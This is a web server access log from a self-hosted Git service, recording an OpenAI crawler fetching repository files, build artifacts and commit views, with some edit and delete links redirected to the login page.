"/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-3_error.log" [Client 74.7.227.38] [Length 15224] [Gzip 7.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-3_error.log" -[17/Feb/2026:16:17:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-1_error.log" [Client 74.7.227.38] [Length 10515] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-1_error.log" -[17/Feb/2026:16:17:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-3_error.log" [Client 74.7.227.38] [Length 10515] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-3_error.log" -[17/Feb/2026:16:17:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_controller.hpp" [Client 74.7.227.38] [Length 2227] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_controller.hpp" -[17/Feb/2026:16:17:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-1_error.log" [Client 74.7.227.38] [Length 158478] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-1_error.log" -[17/Feb/2026:16:17:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-3_error.log" [Client 74.7.227.38] [Length 21088] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-3_error.log" -[17/Feb/2026:16:17:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_error.log" [Client 74.7.227.38] [Length 28481] [Gzip 9.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs" -[17/Feb/2026:16:17:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-2_error.log" [Client 74.7.227.38] [Length 14441] [Gzip 4.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs" -[17/Feb/2026:16:17:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" [Client 74.7.227.38] [Length 14418] [Gzip 11.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" -[17/Feb/2026:16:17:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/lib64?follow_symlink=1" [Client 74.7.227.38] [Length 11052] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv" -[17/Feb/2026:16:17:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/lib64?follow_symlink=1" [Client 74.7.227.38] [Length 11058] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv" -[17/Feb/2026:16:17:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/Makefile2?display=source" [Client 74.7.227.38] [Length 14304] [Gzip 4.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:16:17:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=npm%2fdata%2flogs%2fproxy-host-1_error.log" [Client 74.7.227.38] [Length 27145] [Gzip 8.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-1_error.log" -[17/Feb/2026:16:17:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=npm%2fdata%2flogs%2fproxy-host-3_error.log" [Client 74.7.227.38] [Length 21290] [Gzip 3.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-3_error.log" -[17/Feb/2026:16:17:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/Makefile2?display=rendered" [Client 74.7.227.38] [Length 11035] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:16:17:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10554] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:16:17:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 11302] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:17:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_error.log" [Client 74.7.227.38] [Length 34307] [Gzip 13.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_error.log" -[17/Feb/2026:16:17:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-2_error.log" [Client 74.7.227.38] [Length 15225] [Gzip 7.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-2_error.log" -[17/Feb/2026:16:17:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_error.log" [Client 74.7.227.38] [Length 10693] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_error.log" -[17/Feb/2026:16:17:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-2_error.log" [Client 74.7.227.38] [Length 10147] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-2_error.log" -[17/Feb/2026:16:17:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-2_error.log" [Client 74.7.227.38] [Length 21360] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-2_error.log" -[17/Feb/2026:16:17:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_error.log" [Client 74.7.227.38] [Length 163197] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_error.log" -[17/Feb/2026:16:17:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor-VeryGood2.py" [Client 74.7.227.38] [Length 17351] [Gzip 5.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" -[17/Feb/2026:16:17:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol?display=rendered" [Client 74.7.227.38] [Length 18659] [Gzip 3.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol" -[17/Feb/2026:16:17:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/models.py?display=source" [Client 74.7.227.38] [Length 13379] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/models.py" -[17/Feb/2026:16:17:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15100] [Gzip 5.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:17:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 9968] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:16:17:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 11035] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:17:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 11031] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:17:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=npm%2fdata%2flogs%2fproxy-host-4_error.log" [Client 74.7.227.38] [Length 20795] [Gzip 3.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_error.log" -[17/Feb/2026:16:17:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 13707] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:16:17:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 114] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:16:17:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/index.html?display=source" [Client 74.7.227.38] [Length 14402] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/index.html" -[17/Feb/2026:16:17:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor-VeryGood2.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor-VeryGood2.py" -[17/Feb/2026:16:17:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4843] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor-VeryGood2.py" -[17/Feb/2026:16:17:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor-VeryGood2.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor-VeryGood2.py" -[17/Feb/2026:16:17:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4843] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor-VeryGood2.py" -[17/Feb/2026:16:17:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/GoldMonitor-VeryGood2.py" [Client 74.7.227.38] [Length 9788] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor-VeryGood2.py" -[17/Feb/2026:16:17:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 9958] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:16:17:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 6259] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:16:17:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 9970] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:16:17:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 21622] [Gzip 28.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:16:17:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 9968] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" -[17/Feb/2026:16:17:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 13638] [Gzip 7.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:16:17:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15355] [Gzip 8.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:16:17:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 9954] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:16:17:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 12544] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" -[17/Feb/2026:16:17:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 12560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:16:17:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 21667] [Gzip 28.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 